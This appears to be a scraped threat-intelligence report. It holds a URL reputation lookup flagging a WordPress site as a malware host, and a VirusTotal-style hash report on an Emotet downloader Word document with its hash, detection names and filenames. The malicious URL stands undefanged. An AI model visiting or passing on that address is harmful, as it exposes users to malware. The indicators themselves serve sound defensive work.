\n* Information for http:\/\/eliesalibaarchitect.com\/wordpress\/T\/
\n* Observable type: url (Auto-detected: True)
\n********************************************************************************
\nNot seeing what you expect? Likely not a valid site. Try running with –list-sites
\n[-] No URL Unshorten Results
\n[+] Fortinet Category Results
\n [-] Fortinet URL Category: Malicious Websites
\n[+] VirusTotal URL Report Results
\n [-] Date submitted: 2020-09-22 05:04:16
\n [-] Detected scanners: 12
\n [-] Total scanners: 79
\n [-] URL Scanner: (‘Kaspersky’, ‘malware site’)
\n [-] URL Scanner: (‘CyRadar’, ‘malicious site’)
\n [-] URL Scanner: (‘AlienVault’, ‘malicious site’)
\n [-] URL Scanner: (‘Spamhaus’, ‘malware site’)
\n [-] URL Scanner: (‘Avira’, ‘malware site’)
\n [-] URL Scanner: (‘SCUMWARE[.]org’, ‘malware site’)
\n [-] URL Scanner: (‘URLhaus’, ‘malicious site’)
\n [-] URL Scanner: (‘ESET’, ‘malware site’)
\n [-] URL Scanner: (‘Sophos’, ‘malware site’)
\n [-] URL Scanner: (‘Netcraft’, ‘malicious site’)
\n [-] URL Scanner: (‘CRDF’, ‘malicious site’)
\n [-] URL Scanner: (‘Fortinet’, ‘malware site’)<\/p>\n
\n——-
\nOnline Hash Checker for Virustotal and Other Services
\nFlorian Roth – 0.18.1 July 2019 <\/p>\n
\nHASH: 515ade7cffd3da164621375f63150e57f2f8c9f06bad8289c8adde9d3803daa0 COMMENT: LRE-090120 JYW-092120.doc
\nVIRUS: Microsoft: TrojanDownloader:O97M\/Emotet.PEE!MTB \/ Kaspersky: HEUR:Trojan.MSOffice.SAgent.gen \/ McAfee: W97M\/Downloader.dbv \/ TrendMicro: Trojan.W97M.EMOTET.TIOIBELH \/ ESET-NOD32: VBA\/TrojanDownloader.Agent.UFY \/ Symantec: W97M.Downloader \/ F-Secure: Malware.VBA\/Dldr.Agent.boxrg \/ Sophos: Mal\/DocDl-K \/ GData: VB:Trojan.VBA.Agent.BHR
\nTYPE: MS Word Document SIZE: 199.12 KB FILENAMES: Price – Sep 21, 2020.doc, Price – Sep 21, 2020.doc
\nFIRST: 2020-09-21 20:04:15 LAST: 2020-09-22 16:56:49 SUBMISSIONS: 1 REPUTATION: 0
\nCOMMENTS: 3 USERS: thor, inquest.labs, thor TAGS: OBFUSCATED EXE-PATTERN DOC MACROS ATTACHMENT EXECUTES-DROPPED-FILE HIDE-APP CREATE-OLE<\/p>\n","protected":false},"excerpt":{"rendered":"